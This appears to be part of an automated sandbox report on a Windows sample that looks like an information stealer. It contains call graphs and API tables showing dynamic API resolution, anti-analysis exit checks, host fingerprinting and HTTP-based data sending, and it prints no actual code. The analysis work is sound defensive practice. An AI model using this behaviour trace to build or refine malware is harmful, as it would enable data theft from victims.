26658->26659 26660 6c4a60 2 API calls 26659->26660 26661 6c493c 26660->26661 26662 6c4a60 2 API calls 26661->26662 26663 6c4952 26662->26663 26664 6c4a60 2 API calls 26663->26664 26665 6c4968 26664->26665 26666 6c4a60 2 API calls 26665->26666 26667 6c4981 26666->26667 26668 6c4a60 2 API calls 26667->26668 26669 6c4997 26668->26669 26670 6c4a60 2 API calls 26669->26670 26671 6c49ad 26670->26671 26672 6c4a60 2 API calls 26671->26672 26673 6c49c3 26672->26673 26674 6c4a60 2 API calls 26673->26674 26675 6c49d9 26674->26675 26676 6c4a60 2 API calls 26675->26676 26677 6c49ef 26676->26677 26678 6c4a60 2 API calls 26677->26678 26679 6c4a08 26678->26679 26680 6c4a60 2 API calls 26679->26680 26681 6c4a1e 26680->26681 26682 6c4a60 2 API calls 26681->26682 26683 6c4a34 26682->26683 26684 6c4a60 2 API calls 26683->26684 26685 6c4a4a 26684->26685 26686 6e66e0 26685->26686 26687 6e6afe 8 API calls 26686->26687 26688 6e66ed 43 API calls 26686->26688 26689 6e6c08 26687->26689 26690 6e6b94 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26687->26690 26688->26687 26691 6e6c15 8 API calls 26689->26691 26692 6e6cd2 26689->26692 26690->26689 26691->26692 26693 6e6d4f 26692->26693 26694 6e6cdb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26692->26694 26695 6e6d5c 6 API calls 26693->26695 26696 6e6de9 26693->26696 26694->26693 26695->26696 26697 6e6df6 12 API calls 26696->26697 26698 6e6f10 26696->26698 26697->26698 26699 6e6f8d 26698->26699 26700 6e6f19 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26698->26700 26701 6e6f96 GetProcAddress GetProcAddress 26699->26701 26702 6e6fc1 26699->26702 26700->26699 26701->26702 26703 6e6fca GetProcAddress GetProcAddress 26702->26703 26704 6e6ff5 26702->26704 26703->26704 26705 6e70ed 26704->26705 26706 6e7002 10 API calls 26704->26706 26707 6e70f6 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26705->26707 26708 6e7152 26705->26708 26706->26705 26707->26708 26709 6e716e 26708->26709 26710 6e715b GetProcAddress 26708->26710 26711 6e7177 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26709->26711 26712 6e051f 26709->26712 26710->26709 26711->26712 26713 6c1530 26712->26713 27022 6c1610 26713->27022 26715 6c153b 26716 6c1555 lstrcpy 26715->26716 26717 6c155d 26715->26717 26716->26717 26718 6c1577 lstrcpy 26717->26718 26719 6c157f 26717->26719 26718->26719 26720 6c1599 lstrcpy 26719->26720 26722 6c15a1 26719->26722 26720->26722 26721 6c1605 26724 6df1b0 lstrlen 26721->26724 26722->26721 26723 6c15fd lstrcpy 26722->26723 26723->26721 26725 6df1e4 26724->26725 26726 6df1eb lstrcpy 26725->26726 26727 6df1f7 lstrlen 26725->26727 26726->26727 26728 6df208 26727->26728 26729 6df20f lstrcpy 26728->26729 26730 6df21b lstrlen 26728->26730 26729->26730 26731 6df22c 26730->26731 26732 6df233 lstrcpy 26731->26732 26733 6df23f 26731->26733 26732->26733 26734 6df258 lstrcpy 26733->26734 26735 6df264 26733->26735 26734->26735 26736 6df286 lstrcpy 26735->26736 26737 6df292 26735->26737 26736->26737 26738 6df2ba lstrcpy 26737->26738 26739 6df2c6 26737->26739 26738->26739 26740 6df2ea lstrcpy 26739->26740 26778 6df300 26739->26778 26740->26778 26741 6df30c lstrlen 26741->26778 26742 6df4b9 lstrcpy 26742->26778 26743 6df3a1 lstrcpy 26743->26778 26744 6df3c5 lstrcpy 26744->26778 26745 6df4e8 lstrcpy 26806 6df4f0 26745->26806 26746 6c1530 8 API calls 26746->26806 26747 6dee90 28 API calls 26747->26778 26748 6defb0 35 API calls 26748->26806 26749 6df479 lstrcpy 26749->26778 26750 6df59c lstrcpy 26750->26806 26751 6df616 StrCmpCA 26752 6df70f StrCmpCA 26751->26752 26751->26806 26756 6dfe8e 26752->26756 26752->26778 26753 6dfa29 StrCmpCA 26762 6dfe2b 26753->26762 26753->26778 26754 6df73e lstrlen 26754->26778 26755 6dfead lstrlen 26770 6dfec7 26755->26770 26756->26755 26761 6dfea5 lstrcpy 26756->26761 26757 6dfd4d StrCmpCA 26759 6dfd60 Sleep 26757->26759 26767 6dfd75 26757->26767 26758 6df64a lstrcpy 26758->26806 26759->26778 26760 6dfa58 lstrlen 26760->26778 26761->26755 26763 6dfe4a lstrlen 26762->26763 26764 6dfe42 lstrcpy 26762->26764 26765 6dfe64 26763->26765 26764->26763 26777 6dfdce lstrlen 26765->26777 26779 6dfe7c lstrcpy 26765->26779 26766 6df89e lstrcpy 26766->26778 26768 6dfd94 lstrlen 26767->26768 26773 6dfd8c lstrcpy 26767->26773 26781 6dfdae 26768->26781 26769 6df76f lstrcpy 26769->26778 26771 6dfee7 lstrlen 26770->26771 26775 6dfedf lstrcpy 26770->26775 26772 6dff01 26771->26772 26785 6dff21 26772->26785 26786 6dff19 lstrcpy 26772->26786 26773->26768 26774 6dfbb8 lstrcpy 26774->26778 26775->26771 26776 6dfa89 lstrcpy 26776->26778 26792 6dfde8 26777->26792 26778->26741 26778->26742 26778->26743 26778->26744 26778->26745 26778->26747 26778->26749 26778->26752 26778->26753 26778->26754 26778->26757 26778->26760 26778->26766 26778->26769 26778->26774 26778->26776 26780 6df791 lstrcpy 26778->26780 26783 6c1530 8 API calls 26778->26783 26784 6df8cd lstrcpy 26778->26784 26788 6dfaab lstrcpy 26778->26788 26791 6dfbe7 lstrcpy 26778->26791 26796 6df7e2 lstrcpy 26778->26796 26799 6dfafc lstrcpy 26778->26799 26778->26806 26779->26777 26780->26778 26781->26777 26790 6dfdc6 lstrcpy 26781->26790 26783->26778 26784->26806 26787 6c1610 4 API calls 26785->26787 26786->26785 26808 6dfe13 26787->26808 26788->26778 26789 6df698 lstrcpy 26789->26806 26790->26777 26791->26806 26793 6dfe08 26792->26793 26794 6dfe00 lstrcpy 26792->26794 26795 6c1610 4 API calls 26793->26795 26794->26793 26795->26808 26796->26778 26797 6df924 lstrcpy 26797->26806 26798 6df99e StrCmpCA 26798->26753 26798->26806 26799->26778 26800 6dfc3e lstrcpy 26800->26806 26801 6dfcb8 StrCmpCA 26801->26757 26801->26806 26802 6df9cb lstrcpy 26802->26806 26803 6dfce9 lstrcpy 26803->26806 26804 6dee90 28 API calls 26804->26806 26805 6dfa19 lstrcpy 26805->26806 26806->26746 26806->26748 26806->26750 26806->26751 26806->26753 26806->26757 26806->26758 26806->26778 26806->26789 26806->26797 26806->26798 26806->26800 26806->26801 26806->26802 26806->26803 26806->26804 26806->26805 26807 6dfd3a lstrcpy 26806->26807 26807->26806 26808->25832 26810 6e278c GetVolumeInformationA 26809->26810 26811 6e2785 26809->26811 26812 6e27ec GetProcessHeap RtlAllocateHeap 26810->26812 26811->26810 26814 6e2826 wsprintfA 26812->26814 26815 6e2822 26812->26815 26814->26815 27032 6e71e0 26815->27032 26819 6c4c70 26818->26819 26820 6c4c85 26819->26820 26821 6c4c7d lstrcpy 26819->26821 27036 6c4bc0 26820->27036 26821->26820 26823 6c4c90 26824 6c4ccc lstrcpy 26823->26824 26825 6c4cd8 26823->26825 26824->26825 26826 6c4cff lstrcpy 26825->26826 26827 6c4d0b 26825->26827 26826->26827 26828 6c4d2f lstrcpy 26827->26828 26829 6c4d3b 26827->26829 26828->26829 26830 6c4d6d lstrcpy 26829->26830 26831 6c4d79 26829->26831 26830->26831 26832 6c4dac InternetOpenA StrCmpCA 26831->26832 26833 6c4da0 lstrcpy 26831->26833 26834 6c4de0 26832->26834 26833->26832 26835 6c54b8 InternetCloseHandle CryptStringToBinaryA 26834->26835 27040 6e3e70 26834->27040 26837 6c54e8 LocalAlloc 26835->26837 26852 6c55d8 26835->26852 26838 6c54ff CryptStringToBinaryA 26837->26838 26837->26852 26839 6c5529 lstrlen 26838->26839 26840 6c5517 LocalFree 26838->26840 26841 6c553d 26839->26841 26840->26852 26843 6c5557 lstrcpy 26841->26843 26844 6c5563 lstrlen 26841->26844 26842 6c4dfa 26845 6c4e23 lstrcpy lstrcat 26842->26845 26846 6c4e38 26842->26846 26843->26844 26848 6c557d 26844->26848 26845->26846 26847 6c4e5a lstrcpy 26846->26847 26849 6c4e62 26846->26849 26847->26849 26850 6c558f lstrcpy lstrcat 26848->26850 26851 6c55a2 26848->26851 26853 6c4e71 lstrlen 26849->26853 26850->26851 26854 6c55d1 26851->26854 26856 6c55c9 lstrcpy 26851->26856 26852->25861 26855 6c4e89 26853->26855 26854->26852 26857 6c4e95 lstrcpy lstrcat 26855->26857 26858 6c4eac 26855->26858 26856->26854 26857->26858 26859 6c4ed5 26858->26859 26860 6c4ecd lstrcpy 26858->26860 26861 6c4edc lstrlen 26859->26861 26860->26859 26862 6c4ef2 26861->26862 26863 6c4efe lstrcpy lstrcat 26862->26863 26864 6c4f15 26862->26864 26863->26864 26865 6c4f36 lstrcpy 26864->26865 26866 6c4f3e 26864->26866 26865->26866 26867 6c4f65 lstrcpy lstrcat 26866->26867 26868 6c4f7b 26866->26868 26867->26868 26869 6c4fa4 26868->26869 26870 6c4f9c lstrcpy 26868->26870 26871 6c4fab lstrlen 26869->26871 26870->26869 26872 6c4fc1 26871->26872 26873 6c4fcd lstrcpy lstrcat 26872->26873 26874 6c4fe4 26872->26874 26873->26874 26875 6c500d 26874->26875 26876 6c5005 lstrcpy 26874->26876 26877 6c5014 lstrlen 26875->26877 26876->26875 26878 6c502a 26877->26878 26879 6c5036 lstrcpy lstrcat 26878->26879 26880 6c504d 26878->26880 26879->26880 26881 6c5079 26880->26881 26882 6c5071 lstrcpy 26880->26882 26883 6c5080 lstrlen 26881->26883 26882->26881 26884 6c509b 26883->26884 26885 6c50ac lstrcpy lstrcat 26884->26885 26886 6c50bc 26884->26886 26885->26886 26887 6c50da lstrcpy lstrcat 26886->26887 26888 6c50ed 26886->26888 26887->26888 26889 6c510b lstrcpy 26888->26889 26890 6c5113 26888->26890 26889->26890 26891 6c5121 InternetConnectA 26890->26891 26891->26835 26892 6c5150 HttpOpenRequestA 26891->26892 26893 6c518b 26892->26893 26894 6c54b1 InternetCloseHandle 26892->26894 27047 6e7310 lstrlen 26893->27047 26894->26835 26898 6c51a4 27055 6e72c0 26898->27055 26901 6e7280 lstrcpy 26902 6c51c0 26901->26902 26903 6e7310 3 API calls 26902->26903 26904 6c51d5 26903->26904 26905 6e7280 lstrcpy 26904->26905 26906 6c51de 26905->26906 26907 6e7310 3 API calls 26906->26907 26908 6c51f4 26907->26908 26909 6e7280 lstrcpy 26908->26909 26910 6c51fd 26909->26910 26911 6e7310 3 API calls 26910->26911 26912 6c5213 26911->26912 26913 6e7280 lstrcpy 26912->26913 26914 6c521c 26913->26914 26915 6e7310 3 API calls 26914->26915 26916 6c5231 26915->26916 26917 6e7280 lstrcpy 26916->26917 26918 6c523a 26917->26918 26919 6e72c0 2 API calls 26918->26919 26920 6c524d 26919->26920 26921 6e7280 lstrcpy 26920->26921 26922 6c5256 26921->26922 26923 6e7310 3 API calls 26922->26923 26924 6c526b 26923->26924 26925 6e7280 lstrcpy 26924->26925 26926 6c5274 26925->26926 26927 6e7310 3 API calls 26926->26927 26928 6c5289 26927->26928 26929 6e7280 lstrcpy 26928->26929 26930 6c5292 26929->26930 26931 6e72c0 2 API calls 26930->26931 26932 6c52a5 26931->26932 26933 6e7280 lstrcpy 26932->26933 26934 6c52ae 26933->26934 26935 6e7310 3 API calls 26934->26935 26936 6c52c3 26935->26936 26937 6e7280 lstrcpy 26936->26937 26938 6c52cc 26937->26938 26939 6e7310 3 API calls 26938->26939 26940 6c52e2 26939->26940 26941 6e7280 lstrcpy 26940->26941 26942 6c52eb 26941->26942 26943 6e7310 3 API calls 26942->26943 26944 6c5301 26943->26944 26945 6e7280 lstrcpy 26944->26945 26946 6c530a 26945->26946 26947 6e7310 3 API calls 26946->26947 26948 6c531f 26947->26948 26949 6e7280 lstrcpy 26948->26949 26950 6c5328 26949->26950 26951 6e72c0 2 API calls 26950->26951 26952 6c533b 26951->26952 26953 6e7280 lstrcpy 26952->26953 26954 6c5344 26953->26954 26955 6c537c 26954->26955 26956 6c5370 lstrcpy 26954->26956 26957 6e72c0 2 API calls 26955->26957 26956->26955 26958 6c538a 26957->26958 26959 6e72c0 2 API calls 26958->26959 26960 6c5397 26959->26960 26961 6e7280 lstrcpy 26960->26961 26962 6c53a1 26961->26962 26963 6c53b1 lstrlen lstrlen HttpSendRequestA InternetReadFile 26962->26963 26964 6c549c InternetCloseHandle 26963->26964 26968 6c53f2 26963->26968 26966 6c54ae 26964->26966 26965 6c53fd lstrlen 26965->26968 26966->26894 26967 6c542e lstrcpy lstrcat 26967->26968 26968->26964 26968->26965 26968->26967 26969 6c5473 26968->26969 26970 6c546b lstrcpy 26968->26970 26971 6c547a InternetReadFile 26969->26971 26970->26969 26971->26964 26971->26968 26973 6d8cc6 ExitProcess 26972->26973 26988 6d8ccd 26972->26988 26974 6d8ee2 26974->25863 26975 6d8e6f StrCmpCA 26975->26988 26976 6d8e88 lstrlen 26976->26988 26977 6d8d84 StrCmpCA 26977->26988 26978 6d8da4 StrCmpCA 26978->26988 26979 6d8d06 lstrlen 26979->26988 26980 6d8dbd StrCmpCA 26980->26988 26981 6d8ddd StrCmpCA 26981->26988 26982 6d8dfd StrCmpCA 26982->26988 26983 6d8e1d StrCmpCA 26983->26988 26984 6d8e3d StrCmpCA 26984->26988 26985 6d8d5a lstrlen 26985->26988 26986 6d8e56 StrCmpCA 26986->26988 26987 6d8d30 lstrlen 26987->26988 26988->26974 26988->26975 26988->26976 26988->26977 26988->26978 26988->26979 26988->26980 26988->26981 26988->26982 26988->26983 26988->26984 26988->26985 26988->26986 26988->26987 26989 6d8ebb lstrcpy 26988->26989 26989->26988 26990->25869 26991->25871 26992->25877 26993->25879 26994->25885 26995->25887 26996->25893 26997->25897 26998->25903 26999->25905 27000->25909 27001->25923 27002->25927 27003->25926 27004->25922 27005->25926 27006->25944 27007->25929 27008->25930 27009->25934 27010->25940 27011->25941 27012->25947 27013->25954 27014->25956 27015->25980 27016->25984 27017->25983 27018->25979 27019->25983 27020->25993 27023 6c161f 27022->27023 27024 6c162b lstrcpy 27023->27024 27025 6c1633 27023->27025 27024->27025 27026 6c164d lstrcpy 27025->27026 27027 6c1655 27025->27027 27026->27027 27028 6c166f lstrcpy 27027->27028 27030 6c1677 27027->27030 27028->27030 27029 6c1699 27029->26715 27030->27029 27031 6c1691 lstrcpy 27030->27031 27031->27029 27033 6e71e6 27032->27033 27034 6e71fc lstrcpy 27033->27034 27035 6e2860 27033->27035 27034->27035 27035->25858 27037 6c4bd0 27036->27037 27037->27037 27038 6c4bd7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 27037->27038 27039 6c4c41 27038->27039 27039->26823 27041 6e3e83 27040->27041 27042 6e3e9f lstrcpy 27041->27042 27043 6e3eab 27041->27043 27042->27043 27044 6e3ecd lstrcpy 27043->27044 27045 6e3ed5 GetSystemTime 27043->27045 27044->27045 27046 6e3ef3 27045->27046 27046->26842 27049 6e732d 27047->27049 27048 6c519b 27051 6e7280 27048->27051 27049->27048 27050 6e733d lstrcpy lstrcat 27049->27050 27050->27048 27052 6e728c 27051->27052 27053 6e72b4 27052->27053 27054 6e72ac lstrcpy 27052->27054 27053->26898 27054->27053 27057 6e72dc 27055->27057 27056 6c51b7 27056->26901 27057->27056 27058 6e72ed lstrcpy lstrcat 27057->27058 27058->27056 27087 6e31f0 GetSystemInfo wsprintfA 27063 6e8471 120 API calls 2 library calls 27064 6de049 147 API calls 27116 6d8615 48 API calls 27104 6d8615 49 API calls 27071 6e3cc0 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy 27117 6e33c0 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA 27083 6d3959 244 API calls 27088 6d01d9 126 API calls 27066 6e2853 lstrcpy 27072 6e2cd0 GetUserDefaultLocaleName LocalAlloc CharToOemW 27106 6d4b29 303 API calls 27118 6d23a9 298 API calls 27073 6e30a0 GetSystemPowerStatus 27089 6e29a0 GetCurrentProcess IsWow64Process 27093 6cf639 144 API calls 27096 6c16b9 200 API calls 27108 6cbf39 177 API calls 27085 6e3130 GetProcessHeap RtlAllocateHeap RegOpenKeyExA RegQueryValueExA RegCloseKey 27119 6dabb2 120 API calls 27074 6d8c88 16 API calls 27110 6cb309 98 API calls 27075 6e2880 10 API calls 27076 6e4480 OpenProcess GetModuleFileNameExA CloseHandle lstrcpy 27077 6e3480 6 API calls 27097 6e3280 7 API calls 27111 6c7702 free ctype 27078 6e749e 5 API calls ctype 27080 6d2499 290 API calls 27120 6cdb99 671 API calls 27068 6e8819 free free free __getptd 27121 6d8615 47 API calls 27086 6e4e35 7 API calls 27069 6e2c10 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation wsprintfA 27113 6e9711 128 API calls __setmbcp

                                Executed Functions

                                Function 006C4C50 Relevance: 111.1, APIs: 61, Strings: 2, Instructions: 807stringnetworkCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C4C7F
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006C4CD2
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006C4D05
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006C4D35
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006C4D73
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006C4DA6
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 006C4DB6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$InternetOpen
                                • String ID: "$------
                                • API String ID: 2041821634-2370822465
                                • Opcode ID: bf85ab55343be3e6aeba5116c3f5ef053374954e8310aee19d07caea1e301c4c
                                • Instruction ID: 1f31feb3414561d2179fa57e26ce0e2d8520b5394bde7dba0869359fc6d029b7
                                • Opcode Fuzzy Hash: bf85ab55343be3e6aeba5116c3f5ef053374954e8310aee19d07caea1e301c4c
                                • Instruction Fuzzy Hash: 8A5245719016169BCB61EBA5DC59FBE7BBAEF44310F04402CE90AAB251DF34ED42CB94
                                Function 006E6390 Relevance: 58.0, APIs: 32, Strings: 1, Instructions: 218libraryloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2125 6e6390-6e63bd GetPEB 2126 6e65c3-6e6623 LoadLibraryA * 5 2125->2126 2127 6e63c3-6e65be call 6e62f0 GetProcAddress * 20 2125->2127 2129 6e6638-6e663f 2126->2129 2130 6e6625-6e6633 GetProcAddress 2126->2130 2127->2126 2132 6e666c-6e6673 2129->2132 2133 6e6641-6e6667 GetProcAddress * 2 2129->2133 2130->2129 2134 6e6688-6e668f 2132->2134 2135 6e6675-6e6683 GetProcAddress 2132->2135 2133->2132 2137 6e66a4-6e66ab 2134->2137 2138 6e6691-6e669f GetProcAddress 2134->2138 2135->2134 2139 6e66ad-6e66d2 GetProcAddress * 2 2137->2139 2140 6e66d7-6e66da 2137->2140 2138->2137 2139->2140
                                APIs
                                • GetProcAddress.KERNEL32(76210000,00F115C8), ref: 006E63E9
                                • GetProcAddress.KERNEL32(76210000,00F116D0), ref: 006E6402
                                • GetProcAddress.KERNEL32(76210000,00F11568), ref: 006E641A
                                • GetProcAddress.KERNEL32(76210000,00F11700), ref: 006E6432
                                • GetProcAddress.KERNEL32(76210000,00F18B40), ref: 006E644B
                                • GetProcAddress.KERNEL32(76210000,00F05490), ref: 006E6463
                                • GetProcAddress.KERNEL32(76210000,00F05510), ref: 006E647B
                                • GetProcAddress.KERNEL32(76210000,00F116A0), ref: 006E6494
                                • GetProcAddress.KERNEL32(76210000,00F11550), ref: 006E64AC
                                • GetProcAddress.KERNEL32(76210000,00F11598), ref: 006E64C4
                                • GetProcAddress.KERNEL32(76210000,00F116B8), ref: 006E64DD
                                • GetProcAddress.KERNEL32(76210000,00F05590), ref: 006E64F5
                                • GetProcAddress.KERNEL32(76210000,00F11748), ref: 006E650D
                                • GetProcAddress.KERNEL32(76210000,00F117D8), ref: 006E6526
                                • GetProcAddress.KERNEL32(76210000,00F053B0), ref: 006E653E
                                • GetProcAddress.KERNEL32(76210000,00F114F0), ref: 006E6556
                                • GetProcAddress.KERNEL32(76210000,00F11790), ref: 006E656F
                                • GetProcAddress.KERNEL32(76210000,00F05530), ref: 006E6587
                                • GetProcAddress.KERNEL32(76210000,00F11868), ref: 006E659F
                                • GetProcAddress.KERNEL32(76210000,00F05470), ref: 006E65B8
                                • LoadLibraryA.KERNEL32(00F117F0,?,?,?,006E1C03), ref: 006E65C9
                                • LoadLibraryA.KERNEL32(00F11880,?,?,?,006E1C03), ref: 006E65DB
                                • LoadLibraryA.KERNEL32(00F11850,?,?,?,006E1C03), ref: 006E65ED
                                • LoadLibraryA.KERNEL32(00F11820,?,?,?,006E1C03), ref: 006E65FE
                                • LoadLibraryA.KERNEL32(00F11898,?,?,?,006E1C03), ref: 006E6610
                                • GetProcAddress.KERNEL32(75B30000,00F11808), ref: 006E662D
                                • GetProcAddress.KERNEL32(751E0000,00F118B0), ref: 006E6649
                                • GetProcAddress.KERNEL32(751E0000,00F11838), ref: 006E6661
                                • GetProcAddress.KERNEL32(76910000,00F18E68), ref: 006E667D
                                • GetProcAddress.KERNEL32(75670000,00F055B0), ref: 006E6699
                                • GetProcAddress.KERNEL32(77310000,00F18BC0), ref: 006E66B5
                                • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 006E66CC
                                Strings
                                • NtQueryInformationProcess, xrefs: 006E66C1
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: NtQueryInformationProcess
                                • API String ID: 2238633743-2781105232
                                • Opcode ID: 58d5622fc37db532ec582723a8f87dca5cf70c010403d4f75608452645bf2121
                                • Instruction ID: 9f187ac28794306f93721ce8209273a48d669d0a9219282f4fd6507804df72ab
                                • Opcode Fuzzy Hash: 58d5622fc37db532ec582723a8f87dca5cf70c010403d4f75608452645bf2121
                                • Instruction Fuzzy Hash: D3A129B5A11A00EFD754DF79ED88F363BB9FB88741300851AE99683364EE74A840DF64
                                Function 006E1BF0 Relevance: 45.2, APIs: 30, Instructions: 220stringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2141 6e1bf0-6e1c0b call 6c2a90 call 6e6390 2146 6e1c0d 2141->2146 2147 6e1c1a-6e1c27 call 6c2930 2141->2147 2148 6e1c10-6e1c18 2146->2148 2151 6e1c29-6e1c2f lstrcpy 2147->2151 2152 6e1c35-6e1c63 2147->2152 2148->2147 2148->2148 2151->2152 2156 6e1c6d-6e1c7b GetSystemInfo 2152->2156 2157 6e1c65-6e1c67 ExitProcess 2152->2157 2158 6e1c7d-6e1c7f ExitProcess 2156->2158 2159 6e1c85-6e1ca0 call 6c1030 call 6c10c0 GetUserDefaultLangID 2156->2159 2164 6e1cb8-6e1cca call 6e2ad0 call 6e3e10 2159->2164 2165 6e1ca2-6e1ca9 2159->2165 2171 6e1ccc-6e1cde call 6e2a40 call 6e3e10 2164->2171 2172 6e1ce7-6e1d06 lstrlen call 6c2930 2164->2172 2165->2164 2166 6e1cb0-6e1cb2 ExitProcess 2165->2166 2171->2172 2185 6e1ce0-6e1ce1 ExitProcess 2171->2185 2177 6e1d08-6e1d0d 2172->2177 2178 6e1d23-6e1d40 lstrlen call 6c2930 2172->2178 2177->2178 2180 6e1d0f-6e1d11 2177->2180 2186 6e1d5a-6e1d7b call 6e2ad0 lstrlen call 6c2930 2178->2186 2187 6e1d42-6e1d44 2178->2187 2180->2178 2183 6e1d13-6e1d1d lstrcpy lstrcat 2180->2183 2183->2178 2193 6e1d7d-6e1d7f 2186->2193 2194 6e1d9a-6e1db4 lstrlen call 6c2930 2186->2194 2187->2186 2188 6e1d46-6e1d54 lstrcpy lstrcat 2187->2188 2188->2186 2193->2194 2196 6e1d81-6e1d85 2193->2196 2199 6e1dce-6e1deb call 6e2a40 lstrlen call 6c2930 2194->2199 2200 6e1db6-6e1db8 2194->2200 2196->2194 2198 6e1d87-6e1d94 lstrcpy lstrcat 2196->2198 2198->2194 2206 6e1ded-6e1def 2199->2206 2207 6e1e0a-6e1e0f 2199->2207 2200->2199 2201 6e1dba-6e1dc8 lstrcpy lstrcat 2200->2201 2201->2199 2206->2207 2208 6e1df1-6e1df5 2206->2208 2209 6e1e16-6e1e22 call 6c2930 2207->2209 2210 6e1e11 call 6c2a20 2207->2210 2208->2207 2212 6e1df7-6e1e04 lstrcpy lstrcat 2208->2212 2215 6e1e24-6e1e26 2209->2215 2216 6e1e30-6e1e66 call 6c2a20 * 5 OpenEventA 2209->2216 2210->2209 2212->2207 2215->2216 2217 6e1e28-6e1e2a lstrcpy 2215->2217 2228 6e1e8c-6e1ea0 CreateEventA call 6e1b20 call 6dffd0 2216->2228 2229 6e1e68-6e1e8a CloseHandle Sleep OpenEventA 2216->2229 2217->2216 2233 6e1ea5-6e1eae CloseHandle ExitProcess 2228->2233 2229->2228 2229->2229
                                APIs
                                  • Part of subcall function 006E6390: GetProcAddress.KERNEL32(76210000,00F115C8), ref: 006E63E9
                                  • Part of subcall function 006E6390: GetProcAddress.KERNEL32(76210000,00F116D0), ref: 006E6402
                                  • Part of subcall function 006E6390: GetProcAddress.KERNEL32(76210000,00F11568), ref: 006E641A
                                  • Part of subcall function 006E6390: GetProcAddress.KERNEL32(76210000,00F11700), ref: 006E6432
                                  • Part of subcall function 006E6390: GetProcAddress.KERNEL32(76210000,00F18B40), ref: 006E644B
